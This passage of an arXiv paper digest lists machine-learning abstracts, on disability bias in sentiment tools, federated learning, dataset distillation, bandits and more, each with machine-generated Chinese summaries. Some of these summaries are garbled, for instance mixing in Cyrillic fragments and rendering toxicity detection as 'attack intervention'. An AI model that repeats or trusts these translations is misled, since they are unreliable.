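    return a + relu(b - a)              # exact identity implementable with ReLU units

def max_via_relu(x):
    vals = list(x)
    while len(vals) > 1:                # one tree level per iteration
        nxt = [pairwise_max(vals[i], vals[i + 1]) for i in range(0, len(vals) - 1, 2)]
        if len(vals) % 2 == 1:
            nxt.append(vals[-1])
        vals = nxt
    return vals[0]

x = np.random.default_rng(0).normal(size=13)
print(np.isclose(max_via_relu(x), x.max()))  # True
```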

Automated Ableism: An Exploration of Explicit Disability Biases in Sentiment and Toxicity Analysis Models

  • paper_url: http://arxiv.org/abs/2307.09209
  • repo_url: None
  • paper_authors: Pranav Narayanan Venkit, Mukund Srinath, Shomir Wilson
  • for: 本研究旨在探讨 sentiment analysis 和攻击干预模型在探测人际障碍 (PWD) 的表现时是否存在显著的偏见。
  • methods: 我们使用了 Perturbation Sensitivity Analysis 检测探测 Twitter 和 Reddit 社交媒体平台上关于 PWD 的对话,以获得实际社交场景中如何传播残障偏见的信息。然后,我们创建了 \textit{Bias Identification Test in Sentiment} (BITS) корпуス,以量化任何 sentiment analysis 和攻击干预模型中的直接残障偏见。
  • results: 我们的研究发现,这些open AIaaS sentiment analysis 工具(包括 TextBlob、VADER、Google Cloud Natural Language API 和 DistilBERT)以及两个攻击干预模型(包括 two versions of Toxic-BERT)都存在显著的直接残障偏见。
    Abstract We analyze sentiment analysis and toxicity detection models to detect the presence of explicit bias against people with disability (PWD). We employ the bias identification framework of Perturbation Sensitivity Analysis to examine conversations related to PWD on social media platforms, specifically Twitter and Reddit, in order to gain insight into how disability bias is disseminated in real-world social settings. We then create the \textit{Bias Identification Test in Sentiment} (BITS) corpus to quantify explicit disability bias in any sentiment analysis and toxicity detection models. Our study utilizes BITS to uncover significant biases in four open AIaaS (AI as a Service) sentiment analysis tools, namely TextBlob, VADER, Google Cloud Natural Language API, DistilBERT and two toxicity detection models, namely two versions of Toxic-BERT. Our findings indicate that all of these models exhibit statistically significant explicit bias against PWD.
    摘要 我们对偏见检测和负面情绪检测模型进行分析,以检测对人障(PWD)的直接偏见。我们使用扰动敏感性分析框架来分析社交媒体平台上关于PWD的对话,以获得实际社会中对障碍偏见的准确情况。然后,我们创建了《偏见标准测试集》(BITS)来衡量任何情感分析和负面情绪检测模型中的直接障碍偏见。我们的研究使用BITS来揭示四个开放的 AIaaS(人工智能 как服务)情感分析工具——TextBlob、VADER、Google Cloud Natural Language API和DistilBERT——以及两个负面情绪检测模型——两个版本的 Toxic-BERT——中的明显偏见。我们的发现表明,这些模型都存在 statistically significant的直接障碍偏见。
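The perturbation-sensitivity idea can be illustrated with one of the audited off-the-shelf tools; the template and identity terms below are illustrative only and are not the BITS corpus.

```python
# Sketch of perturbation sensitivity analysis: hold the sentence fixed, swap the
# identity term, and compare the analyzer's scores (here TextBlob polarity).
from textblob import TextBlob

template = "I am a {} person and I enjoy my work."
terms = ["deaf", "blind", "sighted", "hearing"]   # illustrative perturbation list

for term in terms:
    polarity = TextBlob(template.format(term)).sentiment.polarity
    print(f"{term:>8}: polarity = {polarity:+.3f}")
```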

Context-Conditional Navigation with a Learning-Based Terrain- and Robot-Aware Dynamics Model

  • paper_url: http://arxiv.org/abs/2307.09206
  • repo_url: None
  • paper_authors: Suresh Guttikonda, Jan Achterhold, Haolong Li, Joschka Boedecker, Joerg Stueckler
  • For: 本研究旨在开发一种能够适应环境与机器人属性变化的自主导航方法。
  • Methods: 本研究使用基于神经过程元学习的、对地形和机器人均有感知能力的前向动力学模型,以适应不同地形与机器人动力学的变化。
  • Results: 实验表明,所提模型在长时域轨迹预测任务中的预测误差更低,并且在下游的导航规划任务中能规划出控制效率更高的路径。
    Abstract In autonomous navigation settings, several quantities can be subject to variations. Terrain properties such as friction coefficients may vary over time depending on the location of the robot. Also, the dynamics of the robot may change due to, e.g., different payloads, changing the system's mass, or wear and tear, changing actuator gains or joint friction. An autonomous agent should thus be able to adapt to such variations. In this paper, we develop a novel probabilistic, terrain- and robot-aware forward dynamics model, termed TRADYN, which is able to adapt to the above-mentioned variations. It builds on recent advances in meta-learning forward dynamics models based on Neural Processes. We evaluate our method in a simulated 2D navigation setting with a unicycle-like robot and different terrain layouts with spatially varying friction coefficients. In our experiments, the proposed model exhibits lower prediction error for the task of long-horizon trajectory prediction, compared to non-adaptive ablation models. We also evaluate our model on the downstream task of navigation planning, which demonstrates improved performance in planning control-efficient paths by taking robot and terrain properties into account.
    摘要 在自主导航场景中,许多量都可能发生变化。例如,地形特性(如摩擦系数)会随机器人所处位置的不同而随时间变化;机器人自身的动力学也可能改变,例如负载不同导致系统质量变化,或因磨损导致执行器增益或关节摩擦变化。因此,自主智能体应当能够适应这些变化。在这篇论文中,我们开发了一种新的概率式、对地形和机器人都有感知能力的前向动力学模型 TRADYN,它能够适应上述变化。该模型建立在基于神经过程的前向动力学模型元学习的最新进展之上。我们在一个模拟的二维导航环境中,使用类独轮车(unicycle-like)机器人和摩擦系数随空间变化的多种地形布局对其进行评估。实验表明,与不具备自适应能力的消融模型相比,所提模型在长时域轨迹预测任务中的预测误差更低。我们还在下游的导航规划任务中评估了该模型,结果显示,在考虑机器人与地形特性后,其能规划出控制效率更高的路径。

Learning Dynamic Attribute-factored World Models for Efficient Multi-object Reinforcement Learning

  • paper_url: http://arxiv.org/abs/2307.09205
  • repo_url: None
  • paper_authors: Fan Feng, Sara Magliacane
  • for: 这个论文的目的是提高强化学习任务中agent的扩展性和可重复性,使其能够在不同的物体和属性下进行学习和执行任务。
  • methods: 这个论文使用了对象中心表示学习来提取视觉输入中的物体,并将其分类为不同的类别。然后,对每个类别的物体,学习一个类模板图,描述了这种物体的动力和奖励如何因属性分解。还学习了对象之间的互动模式图,描述了不同类别的物体之间的互动。通过这些图和动态互动图,学习出一个策略,可以在新环境中直接应用。
  • results: 在三个标准 dataset上测试了这个框架,并证明了它在未seen的物体、属性和潜在参数下进行扩展和可重复性的任务时表现出色,以及在组合已知任务时的表现也是比较好的。
    Abstract In many reinforcement learning tasks, the agent has to learn to interact with many objects of different types and generalize to unseen combinations and numbers of objects. Often a task is a composition of previously learned tasks (e.g. block stacking). These are examples of compositional generalization, in which we compose object-centric representations to solve complex tasks. Recent works have shown the benefits of object-factored representations and hierarchical abstractions for improving sample efficiency in these settings. On the other hand, these methods do not fully exploit the benefits of factorization in terms of object attributes. In this paper, we address this opportunity and introduce the Dynamic Attribute FacTored RL (DAFT-RL) framework. In DAFT-RL, we leverage object-centric representation learning to extract objects from visual inputs. We learn to classify them in classes and infer their latent parameters. For each class of object, we learn a class template graph that describes how the dynamics and reward of an object of this class factorize according to its attributes. We also learn an interaction pattern graph that describes how objects of different classes interact with each other at the attribute level. Through these graphs and a dynamic interaction graph that models the interactions between objects, we can learn a policy that can then be directly applied in a new environment by just estimating the interactions and latent parameters. We evaluate DAFT-RL in three benchmark datasets and show our framework outperforms the state-of-the-art in generalizing across unseen objects with varying attributes and latent parameters, as well as in the composition of previously learned tasks.
    摘要 在许多强化学习任务中,机器人需要学习与多种不同类型的物体交互,并泛化到未经见过的组合和数量。经常情况下,任务是一个各种已经学习过的任务的组合(例如堆叠块)。这些任务是物体中心的泛化,在这些情况下,我们可以通过物体中心的表示学习来解决复杂任务。在这篇论文中,我们提出了动态特征划分RL(DAFT-RL)框架。在DAFT-RL中,我们利用物体中心的表示学习来提取视觉输入中的物体。我们可以将它们分类为类别,并且从属特征参数的推断。对于每个类型的物体,我们学习一个类型图,该图描述了物体的动力学和奖励因为其特征的分解。我们还学习了不同类型物体之间的交互图,该图描述了物体之间的特征级别交互。通过这些图和动态交互图,我们可以学习一个策略,该策略可以在新环境中直接应用,只需要估计交互和隐藏参数。我们在三个标准数据集上进行了评估,并证明了我们的框架在未经见过的物体特征和隐藏参数的泛化,以及在组合已经学习过的任务中表现出色。

Federated Learning for Computationally-Constrained Heterogeneous Devices: A Survey

  • paper_url: http://arxiv.org/abs/2307.09182
  • repo_url: None
  • paper_authors: Kilian Pfeiffer, Martin Rapp, Ramin Khalili, Jörg Henkel
  • for: 提高用户隐私和减少中心服务器的负担,实现在设备上进行神经网络训练。
  • methods: 联邦学习(Federated Learning)技术,通过共享设备之间的知识,保持用户隐私,同时提高模型精度。
  • results: 在具有多种设备的不同硬件和软件环境中,联邦学习技术面临着多种差异和挑战,需要采取多种策略来减少这些差异,以提高模型精度和可靠性。
    Abstract With an increasing number of smart devices like internet of things (IoT) devices deployed in the field, offloadingtraining of neural networks (NNs) to a central server becomes more and more infeasible. Recent efforts toimprove users' privacy have led to on-device learning emerging as an alternative. However, a model trainedonly on a single device, using only local data, is unlikely to reach a high accuracy. Federated learning (FL)has been introduced as a solution, offering a privacy-preserving trade-off between communication overheadand model accuracy by sharing knowledge between devices but disclosing the devices' private data. Theapplicability and the benefit of applying baseline FL are, however, limited in many relevant use cases dueto the heterogeneity present in such environments. In this survey, we outline the heterogeneity challengesFL has to overcome to be widely applicable in real-world applications. We especially focus on the aspect ofcomputation heterogeneity among the participating devices and provide a comprehensive overview of recentworks on heterogeneity-aware FL. We discuss two groups: works that adapt the NN architecture and worksthat approach heterogeneity on a system level, covering Federated Averaging (FedAvg), distillation, and splitlearning-based approaches, as well as synchronous and asynchronous aggregation schemes.
    摘要 随着物联网(IoT)设备等智能设备在现场部署数量不断增加,将神经网络(NN)的训练卸载到中央服务器变得越来越不可行。为了保护用户隐私,设备端学习(on-device learning)随之成为一种替代方案。然而,仅在单个设备上、仅用本地数据训练的模型很难达到较高的精度。联邦学习(FL)被提出来解决这一问题:它在通信开销与模型精度之间提供了一种保护隐私的折中,通过在设备之间共享知识而不泄露设备的私有数据。然而,在许多相关应用场景中,由于环境中存在的异构性,基础 FL 方法的适用性和收益都受到限制。在这篇综述中,我们梳理了 FL 要想在真实应用中广泛落地所必须克服的异构性挑战,尤其关注参与设备之间计算能力的异构性,并对异构感知 FL 的近期工作给出了全面概述。我们将这些工作分为两类:一类是对神经网络架构进行调整的方法,另一类是在系统层面应对异构性的方法,涵盖联邦平均(FedAvg)、蒸馏、基于拆分学习(split learning)的方法,以及同步与异步聚合方案。
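For readers new to the area, the FedAvg aggregation step that most surveyed heterogeneity-aware methods extend or replace is only a weighted parameter average, as in this minimal sketch:

```python
# Minimal FedAvg aggregation: average client model states weighted by local dataset size.
from typing import Dict, List
import torch

def fedavg(client_states: List[Dict[str, torch.Tensor]], client_sizes: List[int]) -> Dict[str, torch.Tensor]:
    total = float(sum(client_sizes))
    return {
        key: sum(state[key].float() * (n / total) for state, n in zip(client_states, client_sizes))
        for key in client_states[0]
    }

# toy usage with two "clients" sharing a one-layer model
a = {"w": torch.ones(2, 2), "b": torch.zeros(2)}
b = {"w": 3 * torch.ones(2, 2), "b": torch.ones(2)}
print(fedavg([a, b], client_sizes=[10, 30]))
```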

ECSIC: Epipolar Cross Attention for Stereo Image Compression

  • paper_url: http://arxiv.org/abs/2307.10284
  • repo_url: None
  • paper_authors: Matthias Wödlinger, Jan Kotera, Manuel Keglevic, Jan Xu, Robert Sablatnig
  • for: 这个论文是为了提出一种新的学习基于方法,用于压缩立体图像。
  • methods: 该方法利用两个 Stereo Context 模块和一个 Stereo Cross Attention(SCA)模块来联合压缩左右图像。SCA 模块仅在两幅图像相对应的极线(epipolar line)上进行交叉注意力,并对其并行处理。
  • results: 与其他方法相比,ECSIC 在 Cityscapes 和 InStereo2k 这两个流行的立体图像数据集上达到了最优性能,同时支持快速的编码与解码,非常适合实时应用。
    Abstract In this paper, we present ECSIC, a novel learned method for stereo image compression. Our proposed method compresses the left and right images in a joint manner by exploiting the mutual information between the images of the stereo image pair using a novel stereo cross attention (SCA) module and two stereo context modules. The SCA module performs cross-attention restricted to the corresponding epipolar lines of the two images and processes them in parallel. The stereo context modules improve the entropy estimation of the second encoded image by using the first image as a context. We conduct an extensive ablation study demonstrating the effectiveness of the proposed modules and a comprehensive quantitative and qualitative comparison with existing methods. ECSIC achieves state-of-the-art performance among stereo image compression models on the two popular stereo image datasets Cityscapes and InStereo2k while allowing for fast encoding and decoding, making it highly practical for real-time applications.
    摘要 在这篇论文中,我们提出了一种新的基于学习的立体图像压缩方法 ECSIC。该方法利用立体图像对之间的互信息,对左右图像进行联合压缩,具体通过一个新颖的立体交叉注意力(SCA)模块和两个立体上下文模块实现。SCA 模块将交叉注意力限制在两幅图像相对应的极线上,并对其并行处理;两个立体上下文模块则以第一幅图像作为上下文,改进第二幅编码图像的熵估计。我们进行了广泛的消融研究以验证所提模块的有效性,并与现有方法进行了全面的定量与定性比较。ECSIC 在 Cityscapes 和 InStereo2k 这两个流行的立体图像数据集上达到了立体图像压缩模型的最优性能,同时支持快速的编码与解码,因而非常适合实时应用。

Towards Trustworthy Dataset Distillation

  • paper_url: http://arxiv.org/abs/2307.09165
  • repo_url: None
  • paper_authors: Shijie Ma, Fei Zhu, Zhen Cheng, Xu-Yao Zhang
  • for: Trustworthy Dataset Distillation(TrustDD)旨在同时蒸馏分布内(InD)样本与异常样本,在降低深度学习模型训练成本的同时提升其在真实应用中的可信度。
  • methods: 该方法利用数据集蒸馏(DD)将大规模数据集浓缩为小型合成数据集,并引入 Pseudo-Outlier Exposure(POE),通过破坏 InD 样本生成伪异常样本来增强分布外(OOD)检测。
  • results: 多种设置下的全面实验验证了 TrustDD 的有效性,所提出的 POE 超越了最新方法 Outlier Exposure(OE);与以往的 DD 方法相比,TrustDD 更加可信,也更适用于真实的开放世界场景。
    Abstract Efficiency and trustworthiness are two eternal pursuits when applying deep learning in real-world applications. With regard to efficiency, dataset distillation (DD) endeavors to reduce training costs by distilling the large dataset into a tiny synthetic dataset. However, existing methods merely concentrate on in-distribution (InD) classification in a closed-world setting, disregarding out-of-distribution (OOD) samples. On the other hand, OOD detection aims to enhance models' trustworthiness, which is always inefficiently achieved in full-data settings. For the first time, we simultaneously consider both issues and propose a novel paradigm called Trustworthy Dataset Distillation (TrustDD). By distilling both InD samples and outliers, the condensed datasets are capable to train models competent in both InD classification and OOD detection. To alleviate the requirement of real outlier data and make OOD detection more practical, we further propose to corrupt InD samples to generate pseudo-outliers and introduce Pseudo-Outlier Exposure (POE). Comprehensive experiments on various settings demonstrate the effectiveness of TrustDD, and the proposed POE surpasses state-of-the-art method Outlier Exposure (OE). Compared with the preceding DD, TrustDD is more trustworthy and applicable to real open-world scenarios. Our code will be publicly available.
    摘要 “效率和可靠性是深度学习在实际应用中的两大永恒追求。在效率方面,数据集蒸馏(DD)尝试将大数据集蒸馏为一个小型的合成数据集,以降低训练成本。然而,现有方法仅关注封闭世界设定下的分布内(InD)分类,忽略了分布外(OOD)样本。另一方面,OOD 检测旨在增强模型的可靠性,但在全量数据设定下通常效率低下。我们首次同时考虑这两个问题,并提出了一种称为可信数据集蒸馏(TrustDD)的新范式。通过同时蒸馏 InD 样本和异常样本,蒸馏得到的数据集能够训练出在 InD 分类和 OOD 检测上都具备竞争力的模型。为了避免对真实异常数据的需求并使 OOD 检测更加实用,我们进一步提出对 InD 样本进行破坏以生成伪异常样本,即伪异常暴露(POE)。我们在多种设定下进行了广泛的实验,证明了 TrustDD 的有效性,且所提出的 POE 超过了现有的异常暴露(OE)方法。相比之下,TrustDD 更加可靠,也更适用于真实的开放世界场景。我们的代码将公开发布。”
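
An illustrative sketch of Pseudo-Outlier Exposure (POE)-style training: in-distribution (InD) images are corrupted into pseudo-outliers, and the classifier is pushed toward a uniform posterior on them, as in Outlier Exposure. The specific corruption here (patch shuffling plus strong noise) and the loss weighting are assumptions for illustration, not the paper's exact recipe.

```python
import torch
import torch.nn.functional as F

def make_pseudo_outliers(x: torch.Tensor, noise_std: float = 0.5) -> torch.Tensor:
    """Corrupt InD images (B, C, H, W) into pseudo-outliers (assumes H, W divisible by 4)."""
    B, C, H, W = x.shape
    # split each image into a 4x4 grid of patches and shuffle them
    patches = x.unfold(2, H // 4, H // 4).unfold(3, W // 4, W // 4)   # (B, C, 4, 4, h, w)
    patches = patches.contiguous().view(B, C, 16, H // 4, W // 4)
    perm = torch.randperm(16)
    shuffled = patches[:, :, perm].view(B, C, 4, 4, H // 4, W // 4)
    out = shuffled.permute(0, 1, 2, 4, 3, 5).reshape(B, C, H, W)
    return out + noise_std * torch.randn_like(out)

def poe_loss(model, x_ind, y_ind, lam: float = 0.5):
    logits_ind = model(x_ind)
    ce = F.cross_entropy(logits_ind, y_ind)               # usual InD classification loss
    logits_out = model(make_pseudo_outliers(x_ind))
    # OE-style term: encourage a uniform predictive distribution on pseudo-outliers
    uniform_term = -(F.log_softmax(logits_out, dim=1)).mean()
    return ce + lam * uniform_term
```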

MVA2023 Small Object Detection Challenge for Spotting Birds: Dataset, Methods, and Results

  • paper_url: http://arxiv.org/abs/2307.09143
  • repo_url: https://github.com/iim-ttij/mva2023smallobjectdetection4spottingbirds
  • paper_authors: Yuki Kondo, Norimichi Ukita, Takayuki Yamaguchi, Hao-Yu Hou, Mu-Yi Shen, Chia-Chi Hsu, En-Ming Huang, Yu-Chen Huang, Yu-Cheng Xia, Chien-Yao Wang, Chun-Yi Lee, Da Huo, Marc A. Kastner, Tingwei Liu, Yasutomo Kawanishi, Takatsugu Hirayama, Takahiro Komamizu, Ichiro Ide, Yosuke Shinya, Xinyao Liu, Guang Liang, Syusuke Yasui
  • for: 本研究旨在提出一个新的小物体检测数据集,以便进行远程小物体检测的实际应用。
  • methods: 本文提出了一种新的小物体检测方法,并在223名参与者的挑战中评测了其效果。
  • results: 研究发现,使用这种新方法可以在远距离小物体检测中获得优秀的效果,并且提供了一个大规模的小物体检测数据集和基线代码以便进一步研究。
    Abstract Small Object Detection (SOD) is an important machine vision topic because (i) a variety of real-world applications require object detection for distant objects and (ii) SOD is a challenging task due to the noisy, blurred, and less-informative image appearances of small objects. This paper proposes a new SOD dataset consisting of 39,070 images including 137,121 bird instances, which is called the Small Object Detection for Spotting Birds (SOD4SB) dataset. The detail of the challenge with the SOD4SB dataset is introduced in this paper. In total, 223 participants joined this challenge. This paper briefly introduces the award-winning methods. The dataset, the baseline code, and the website for evaluation on the public testset are publicly available.
    摘要 小物体检测(SOD)是机器视觉领域的重要课题,因为(i)许多现实世界应用需要对远距离物体进行检测,以及(ii)小物体的图像表现存在噪声、模糊且信息量少,使 SOD 成为一项具有挑战性的任务。这篇论文提出了一个新的 SOD 数据集,包含 39,070 张图像和 137,121 个鸟类实例,称为 Small Object Detection for Spotting Birds(SOD4SB)数据集。本文介绍了基于 SOD4SB 数据集的挑战赛细节。总共有 223 名参与者参加了这个挑战,本文还简要介绍了获奖方法。数据集、基线代码以及用于公开测试集评估的网站均已公开。

Characterization of partial wetting by CMAS droplets using multiphase many-body dissipative particle dynamics and data-driven discovery based on PINNs

  • paper_url: http://arxiv.org/abs/2307.09142
  • repo_url: None
  • paper_authors: Elham Kiyani, Mahdi Kooshkbaghi, Khemraj Shukla, Rahul Babu Koneru, Zhen Li, Luis Bravo, Anindya Ghoshal, George Em Karniadakis, Mikko Karttunen
  • For: 这项研究探讨了高粘度熔融 CMAS 液滴在不同初始尺寸和平衡接触角下的湿润动力学。
  • Methods: 研究使用多相多体耗散粒子动力学(mDPD)模拟 CMAS 液滴的湿润动力学,利用物理信息神经网络(PINN)框架辨识描述湿润半径行为的 ODE 参数,并用符号回归表示参数间的关系。
  • Results: 研究刻画了 CMAS 液滴湿润半径的行为,并使用贝叶斯 PINN(B-PINN)评估并量化相关参数的不确定性。该研究将湿润动力学模拟与机器学习技术相结合,为高温应用提供了创新的解决方案。
    Abstract The molten sand, a mixture of calcia, magnesia, alumina, and silicate, known as CMAS, is characterized by its high viscosity, density, and surface tension. The unique properties of CMAS make it a challenging material to deal with in high-temperature applications, requiring innovative solutions and materials to prevent its buildup and damage to critical equipment. Here, we use multiphase many-body dissipative particle dynamics (mDPD) simulations to study the wetting dynamics of highly viscous molten CMAS droplets. The simulations are performed in three dimensions, with varying initial droplet sizes and equilibrium contact angles. We propose a coarse parametric ordinary differential equation (ODE) that captures the spreading radius behavior of the CMAS droplets. The ODE parameters are then identified based on the Physics-Informed Neural Network (PINN) framework. Subsequently, the closed form dependency of parameter values found by PINN on the initial radii and contact angles are given using symbolic regression. Finally, we employ Bayesian PINNs (B-PINNs) to assess and quantify the uncertainty associated with the discovered parameters. In brief, this study provides insight into spreading dynamics of CMAS droplets by fusing simple parametric ODE modeling and state-of-the-art machine learning techniques.
    摘要 熔融砂(CMAS)是氧化钙、氧化镁、氧化铝和硅酸盐的混合物,具有高粘度、高密度和高表面张力。CMAS 的这些特性使其在高温应用中难以处理,需要创新的解决方案和材料来防止其沉积并损坏关键设备。在这里,我们使用多相多体耗散粒子动力学(mDPD)模拟来研究高粘度熔融 CMAS 液滴的湿润动力学。模拟在三维空间中进行,并对初始液滴尺寸和平衡接触角进行变化。我们提出了一个粗粒度的参数化常微分方程(ODE),用于刻画 CMAS 液滴扩散半径的行为,随后基于物理信息神经网络(PINN)框架辨识 ODE 参数,并利用符号回归给出 PINN 所得参数值对初始半径和接触角的闭式依赖关系。最后,我们采用贝叶斯 PINN(B-PINN)来评估和量化所辨识参数的不确定性。简言之,本研究通过将简单的参数化 ODE 建模与最先进的机器学习技术相融合,为 CMAS 液滴的扩散动力学提供了深入的认识。
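
A minimal PINN-style parameter-identification sketch for a spreading-radius ODE. The assumed ODE form dr/dt = a (r_inf - r) and the synthetic observations are placeholders for illustration; the paper identifies its own coarse parametric ODE and then applies symbolic regression and B-PINNs on top.

```python
import torch
import torch.nn as nn

torch.manual_seed(0)
t_data = torch.linspace(0.0, 5.0, 50).unsqueeze(1)
r_data = 1.0 - 0.8 * torch.exp(-1.3 * t_data)        # synthetic radius observations

r_net = nn.Sequential(nn.Linear(1, 32), nn.Tanh(), nn.Linear(32, 32),
                      nn.Tanh(), nn.Linear(32, 1))    # surrogate for r(t)
log_a = torch.zeros(1, requires_grad=True)            # ODE parameters to identify
r_inf = torch.ones(1, requires_grad=True)

opt = torch.optim.Adam(list(r_net.parameters()) + [log_a, r_inf], lr=1e-2)
t_col = torch.linspace(0.0, 5.0, 200).unsqueeze(1).requires_grad_(True)

for step in range(3000):
    opt.zero_grad()
    loss_data = ((r_net(t_data) - r_data) ** 2).mean()            # fit observations
    r_col = r_net(t_col)
    drdt = torch.autograd.grad(r_col.sum(), t_col, create_graph=True)[0]
    residual = drdt - torch.exp(log_a) * (r_inf - r_col)          # ODE residual at collocation points
    loss = loss_data + (residual ** 2).mean()
    loss.backward()
    opt.step()

print("identified a =", torch.exp(log_a).item(), "r_inf =", r_inf.item())  # should approach 1.3 and 1.0
```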

Mining of Single-Class by Active Learning for Semantic Segmentation

  • paper_url: http://arxiv.org/abs/2307.09109
  • repo_url: None
  • paper_authors: Hugues Lambert, Emma Slade
  • for: 本研究的目的是提出一种基于深度优化学习的活动学习策略,以提高特定类型的模型训练效果。
  • methods: 本研究使用的方法是基于深度优化学习的 MiSiCAL 方法,它可以通过量精度相关性来建立高性能的模型训练集。 MiSiCAL 方法不需要重新训练目标模型多次,因此适用于大批量训练。
  • results: 研究结果表明,在 COCO10k 的 171 个类别中,MiSiCAL 有 150 个类别优于随机策略,而最强的基线方法仅在 101 个类别上优于随机策略。
    Abstract Several Active Learning (AL) policies require retraining a target model several times in order to identify the most informative samples and rarely offer the option to focus on the acquisition of samples from underrepresented classes. Here the Mining of Single-Class by Active Learning (MiSiCAL) paradigm is introduced where an AL policy is constructed through deep reinforcement learning and exploits quantity-accuracy correlations to build datasets on which high-performance models can be trained with regards to specific classes. MiSiCAL is especially helpful in the case of very large batch sizes since it does not require repeated model training sessions as is common in other AL methods. This is thanks to its ability to exploit fixed representations of the candidate data points. We find that MiSiCAL is able to outperform a random policy on 150 out of 171 COCO10k classes, while the strongest baseline only outperforms random on 101 classes.
    摘要 一些主动学习(AL)策略需要多次重新训练目标模型才能确定最有信息量的样本,并且很少提供专注于获取代表性不足类别样本的选项。本文提出了一种名为 Mining of Single-Class by Active Learning(MiSiCAL)的范式,通过深度强化学习构建 AL 策略,并利用数量-精度相关性来构建能够针对特定类别训练出高性能模型的数据集。由于 MiSiCAL 能够利用候选数据点的固定表示,它不需要像其他 AL 方法那样反复进行模型训练,因此在批量非常大的情况下尤其有用。我们发现 MiSiCAL 在 COCO10k 的 171 个类别中有 150 个类别优于随机策略,而最强的基线方法仅在 101 个类别上优于随机策略。

  • paper_url: http://arxiv.org/abs/2307.09093
  • repo_url: None
  • paper_authors: Saeed Ghoorchian, Setareh Maghsudi
  • for: The paper is written for solving the problem of sequential decision-making under uncertainty with long feedback delays, particularly in non-stationary environments with structural dependencies amongst the reward distributions.
  • methods: The paper proposes a policy that learns the causal relations between the arms using a stationary structural equation model, and utilizes this knowledge to optimize the decision-making while adapting to drifts.
  • results: The paper proves a regret bound for the performance of the proposed algorithm, and evaluates the method via numerical analysis using synthetic and real-world datasets to detect the regions that contribute the most to the spread of Covid-19 in Italy.
    Abstract Sequential decision-making under uncertainty is often associated with long feedback delays. Such delays degrade the performance of the learning agent in identifying a subset of arms with the optimal collective reward in the long run. This problem becomes significantly challenging in a non-stationary environment with structural dependencies amongst the reward distributions associated with the arms. Therefore, besides adapting to delays and environmental changes, learning the causal relations alleviates the adverse effects of feedback delay on the decision-making process. We formalize the described setting as a non-stationary and delayed combinatorial semi-bandit problem with causally related rewards. We model the causal relations by a directed graph in a stationary structural equation model. The agent maximizes the long-term average payoff, defined as a linear function of the base arms' rewards. We develop a policy that learns the structural dependencies from delayed feedback and utilizes that to optimize the decision-making while adapting to drifts. We prove a regret bound for the performance of the proposed algorithm. Besides, we evaluate our method via numerical analysis using synthetic and real-world datasets to detect the regions that contribute the most to the spread of Covid-19 in Italy.
    摘要 在不确定性下进行序贯决策往往伴随着较长的反馈延迟。这种延迟会降低学习智能体在长期内识别具有最优整体收益的臂子集的能力。在臂的奖励分布之间存在结构性依赖的非平稳环境中,这一问题变得更加困难。因此,除了适应延迟和环境变化之外,学习臂之间的因果关系还能缓解反馈延迟对决策过程的不利影响。我们将上述设定形式化为一个奖励之间存在因果关联的非平稳、延迟组合半臂赌博机问题,并用平稳结构方程模型中的有向图来建模因果关系。智能体的目标是最大化长期平均收益,该收益定义为基础臂奖励的线性函数。我们设计了一种策略,能够从延迟反馈中学习结构性依赖,并利用这一知识在适应漂移的同时优化决策。我们证明了所提算法性能的悔恨界。此外,我们利用合成数据和真实数据进行数值分析来评估该方法,并用其检测对意大利 COVID-19 传播贡献最大的地区。
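
A toy sketch of the basic setting the paper builds on: a combinatorial semi-bandit loop with per-arm UCB indices, top-m super-arm selection, and rewards that only arrive after a fixed delay. This baseline is stationary and has no causal/structural model or drift adaptation, which are the paper's actual contributions; arm counts, delay, and horizon are illustrative.

```python
import numpy as np

rng = np.random.default_rng(0)
K, m, delay, T = 8, 3, 5, 2000
true_means = rng.uniform(0.1, 0.9, size=K)

counts = np.zeros(K)
sums = np.zeros(K)
pending = []                        # (arrival_round, arm, reward)

for t in range(1, T + 1):
    # process feedback whose delay has elapsed
    ready = [p for p in pending if p[0] <= t]
    pending = [p for p in pending if p[0] > t]
    for _, arm, reward in ready:
        counts[arm] += 1
        sums[arm] += reward

    means = np.where(counts > 0, sums / np.maximum(counts, 1), 1.0)
    bonus = np.sqrt(2 * np.log(t) / np.maximum(counts, 1))
    ucb = np.where(counts > 0, means + bonus, np.inf)
    super_arm = np.argsort(-ucb)[:m]            # play the m arms with the highest indices

    for arm in super_arm:                       # semi-bandit: per-arm rewards, delivered later
        reward = rng.binomial(1, true_means[arm])
        pending.append((t + delay, arm, reward))

print("best arms:", np.argsort(-true_means)[:m], "most played:", np.argsort(-counts)[:m])
```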

A Federated learning model for Electric Energy management using Blockchain Technology

  • paper_url: http://arxiv.org/abs/2307.09080
  • repo_url: None
  • paper_authors: Muhammad Shoaib Farooq, Azeen Ahmed Hayat
  • For: The paper aims to address energy shortfall and electricity load shedding in developing countries by improving energy management and increasing the use of renewable energy sources.
  • Methods: The paper proposes the use of federated learning and blockchain technology to forecast energy requirements and to ensure transparency, traceability, and security in energy transactions between prosumers and consumers.
  • Results: The experiment results show that renewable energy sources have produced better and comparable results to other non-renewable energy resources.
    Abstract Energy shortfall and electricity load shedding are the main problems for developing countries. The main causes are lack of management in the energy sector and the use of non-renewable energy sources. The improved energy management and use of renewable sources can be significant to resolve energy crisis. It is necessary to increase the use of renewable energy sources (RESs) to meet the increasing energy demand due to high prices of fossil-fuel based energy. Federated learning (FL) is the most emerging technique in the field of artificial intelligence. Federated learning helps to generate global model at server side by ensemble locally trained models at remote edges sites while preserving data privacy. The global model used to predict energy demand to satisfy the needs of consumers. In this article, we have proposed Blockchain based safe distributed ledger technology for transaction of data between prosumer and consumer to ensure their transparency, traceability and security. Furthermore, we have also proposed a Federated learning model to forecast the energy requirements of consumer and prosumer. Moreover, Blockchain has been used to store excess energy data from prosumer for better management of energy between prosumer and grid. Lastly, the experiment results revealed that renewable energy sources have produced better and comparable results to other non-renewable energy resources.
    摘要 发展中国家面临着能源短缺和电力限载等主要问题,其根本原因在于能源部门管理不足以及对不可再生能源的依赖。改善能源管理并增加可再生能源的使用,对于化解能源危机具有重要意义;面对化石燃料价格不断上涨带来的用能需求增长,提高可再生能源(RES)的使用尤为必要。联邦学习(FL)是人工智能领域最新兴的技术之一,它能够在保护数据隐私的前提下,将远程边缘站点本地训练的模型聚合为服务器端的全局模型,该全局模型可用于预测能源需求以满足用户的需要。在本文中,我们提出了基于区块链的安全分布式账本技术,用于产消者(prosumer)与消费者之间的数据交易,以确保交易的透明性、可追溯性和安全性;同时,我们还提出了一个联邦学习模型来预测消费者和产消者的能源需求。此外,区块链还被用于存储产消者的剩余能源数据,以便更好地管理产消者与电网之间的能源。最后,实验结果表明,可再生能源取得了优于或与其他不可再生能源相当的结果。
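
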